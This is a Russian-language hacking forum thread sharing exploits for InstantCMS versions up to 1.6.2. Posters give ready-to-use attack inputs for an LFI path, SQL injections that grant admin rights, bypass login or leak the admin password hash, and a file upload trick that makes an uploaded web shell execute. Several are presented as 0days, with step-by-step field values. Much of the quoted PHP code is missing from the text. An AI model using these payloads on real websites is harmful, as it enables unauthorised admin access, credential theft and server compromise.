![]() |
Кхм странно...
У тя версия какая? Просто у меня 1.5.3 |
Я тестил на 1.5.3. Да все верно на 1.6.1 эта бага залатана вроде как. Закроем глаза на target_id.
Разберемся с запросом. Нагуляляся по функциям. В итоге ты в этот запрос инжектил? Код:
SELECT id, title, description, NSLeft, NSRight FROM cms_category WHERE id=$item_id ORDER BY id ASCДругая поправка. если ты укажешь в item_id существующий id, то ты железно получишь вывод причину описал выше. Иначе есть риск запороть вывод. Проверь, убедись. |
Ну вчера же вывелось всё равно, в код вмешательств небыло :)
Мистика... |
LFI InstantCMS <===== 1.5.1
Nees: mq=off index.php PHP код:
PHP код:
Код:
Index.php?view=[LFI]%00 |
УРА! Вышла стабильная версия instantCMS 1.6.2, в которой разработчики полатали все выложенные тут баги, но у меня была цель найти еще баг именно в этой версии, что из этого вышло смотрим ниже.
0day. Повышаение прав в cms до админа InstantCms <===1.6.2 (обход фильтра) Как видно из названия, мы можем из простого юзера попасть в админа. Need MQ=off редактирование профиля: /users/frontend.php PHP код:
' (Кавычка) \' (слеш+одинарная кавычка) \" (слеш+двойная кавычка) "(двойная кавычка) насчет 2 и 3 я честно сказать не понял, что разработчики хотели этим мне доказать? давайте обратим внимание на этот запрос. Код:
$sql = "UPDATE cms_users В этой таблице есть столбец отвечающий за группу пользователя: group_id Если она установлена на 1-то наш пользователь-юзер если 2-пользователь админ. Здесь нам интересны $icq, $nickname. $email не интересен, так как он через регулярку проходит. $id-id юзера, у которого мы меняем данные. Ну и как же нам внедрить себя в этот запрос с учетом вышеуказанного фильтра? ЭЛЕМЕНТРАРНО! В поле ваше имя вбиваем: group_id=2 #\ В поле ICQ Вбиваем: 333s \ соответственно $icq=333s \ ; $nickname=group_id=2 #\ Давайте посмотрим, что у нас получилось. Код:
$sql = "UPDATE cms_users АГА. Жареным пахнет. Мы заэкранировали кавычку и вышли в запрос, и закрыли icq мы открывающей кавычкой От nickname и дописали доболнительное значение group_id=2. После выполнения наш юзер, которому мы меняли данные примет group_id=2 и чудесным образом превратится в админа. Вот такая вот интересная бага была найдена в новой версии instantCMS Видео к теме: Код:
https://forum.antichat.ru/showthread.php?p=2145955#post2145955 |
Опять зиро дэй
Auth0r1zat1oN byPass InstantCMS<=== 1.6.2 Need: mq=off Не буду нагромождать лишним кодом. Запрос для авторизации следующий: PHP код:
' (Кавычка) [Реплейсится в `(апостроф)] легко понять, что этого мало. Как юзать: В поле логин пишем: matrix\ в поле пароль пишем: or id=1#\ У нас получится: Код:
SELECT * в результате логин закрылся кавычкой от password и синтаксис не нарушился. примечание: id-айди пользователя под которым мы хотим залогиниться. Вот так мы байпаснули авторизацию. Разработчик о баге и о наличии супер функции mysql_real_escape_string() оповещен. |
УРА! Вышли заплатки на новую версию. Версию instantCMS. Захотел покурить php код вот что получилось
InstantCMS <==1.6.2(2) sql injection (insert) MQ=off /components/frontend.php PHP код:
$title $description пропускают \ Как это заюзать создаем на форуме топик Название:matr1x\ Описание: , (select concat(login,0x3a,password) from cms_users where id=1),1,1,1)# Мы получаем Код:
"INSERT INTO cms_forum_threads (forum_id, user_id, title, description, icon, pubdate, hits)Теперь идем в список топиков и наблюдаем свой топик в описании которого что-то на подобии Код:
admin:5f4dcc3b5aa765d61d8327deb882cf99сообщение для разработчика: r2, привет =))) |
InstantCMS 1.6.2 File upload Тащим свой зад на форму аплоада файлов Код:
http://localhost/users/ваш id/addfile.htmlPHP код:
Код:
addhandler application/x-httpd-php jpgШелленг загрузится в http://localhost/upload/userfiles/[ваш ид]/[имя шелла].jpg и будет выполняться. |
| Время: 21:35 |